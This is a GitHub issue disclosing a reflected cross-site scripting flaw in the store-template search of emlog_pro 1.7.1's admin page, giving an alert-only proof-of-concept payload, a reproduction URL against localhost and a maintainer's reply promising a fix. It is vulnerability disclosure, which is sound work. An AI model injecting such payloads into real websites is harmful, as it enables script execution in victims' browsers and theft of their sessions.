Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Reflected-XSS vulnerabilities via '/admin/store.php' #1 #195

Closed
zhujieta0 opened this issue Oct 16, 2022 · 1 comment
Closed

Reflected-XSS vulnerabilities via '/admin/store.php' #1 #195

zhujieta0 opened this issue Oct 16, 2022 · 1 comment

Comments

@zhujieta0
Copy link

Which version of emlog do you using?

emlog_pro_1.7.1

Expected behavior

Search store templates

Actual behavior

Reflected XSS vulnerabilities

Steps to reproduce the behavior

Url:https://github.com/emlog/emlog/blob/master/admin/store.php

poc:"%2F><img+src%3Dx+onerror%3Dalert%2820221017%29>

1、login in the system as administrators
2、Click into the store-templet
3、 Insert the poc and then click on the search button

http://127.0.0.1/emlog/admin/store.php?keyword=1234%22%2F%3E%3Cimg+src%3Dx+onerror%3Dalert%2820221017%29%3E

图片

@emlog
Copy link
Owner

emlog commented Oct 19, 2022

Thanks, the next version will be fixed.

@emlog emlog closed this as completed Oct 19, 2022
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

2 participants